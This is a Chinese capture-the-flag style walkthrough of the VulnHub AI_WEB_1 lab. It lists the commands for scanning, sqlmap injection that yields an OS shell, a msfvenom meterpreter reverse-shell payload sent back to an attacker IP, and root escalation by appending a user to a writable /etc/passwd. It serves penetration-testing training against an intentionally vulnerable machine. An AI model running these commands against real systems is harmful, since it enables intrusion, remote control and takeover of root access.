简单打靶场之AI_WEB_1
字数 743 2025-08-12 11:34:27
AI_WEB_1 靶场渗透教学文档
0x01 靶场搭建
- 下载靶场环境:
- 下载地址:https://www.vulnhub.com/entry/ai-web-1,353/
- 解压后使用虚拟机软件打开
0x02 信息收集
主机发现
-
使用Metasploit的ARP扫描模块探测存活主机:
msfconsole use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.91.0/24 set THREADS 30 run -
使用Nmap扫描目标主机端口:
nmap -T4 -sC -sV -p- 192.168.91.132 -
使用fscan进行全面扫描:
fscan32.exe -h 192.168.91.132
Web目录扫描
-
使用dirsearch扫描Web目录:
python dirsearch.py -u http://192.168.91.132/ -
发现重要目录:
- robots.txt
- /se3reTdir777/ (可访问)
- 其他目录返回403禁止访问
0x03 SQL注入利用
-
发现/se3reTdir777/存在SQL注入漏洞
-
使用sqlmap进行自动化测试:
python sqlmap.py -r test.txt --batch --level 3 -
获取网站绝对路径:
- 通过访问/robots.txt中的另一个目录(如info.php)获取
- 示例路径:/home/www/html/web1x443290o2sdf92213/m3diNf0/info.php
-
获取交互式shell:
python sqlmap.py -r test.txt --os-shell
0x04 后门上传与利用
-
使用msfvenom生成Linux后门:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.91.139 LPORT=4444 -f elf > shell.elf -
设置Metasploit监听:
msfconsole use exploit/multi/handler set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 192.168.91.139 set LPORT 4444 run -
通过Web执行命令上传并运行后门:
cmd=chmod 777 shell.elf cmd=./shell.elf
0x05 权限提升
自动提权检测
- 使用Metasploit的本地提权建议模块:
meterpreter > run post/multi/recon/local_exploit_suggester
手动提权方法
-
查找SUID文件:
find / -perm -u=s -type f 2>/dev/null -
查找可写文件/目录:
find / -writable -type d 2>/dev/null # 文件夹 find / -writable -type f 2>/dev/null # 文件 -
发现/etc/passwd可写时的提权方法:
- 生成加密密码:
perl -le 'print crypt("123.com","salt")' - 添加特权用户:
echo "testsec:sarxjaiixejOU:0:0:hacker:/root:/bin/bash" >> /etc/passwd - 验证添加:
cat /etc/passwd | grep testsec
- 生成加密密码:
0x06 总结
-
渗透测试关键步骤:
- 信息收集 → 漏洞发现 → 漏洞利用 → 权限提升 → 维持访问
-
提权方法多样,当一种方法失败时应尝试其他途径
-
本靶场涉及的主要技术点:
- ARP扫描
- 目录爆破
- SQL注入利用
- Web后门上传
- 多种提权技术(SUID、可写文件等)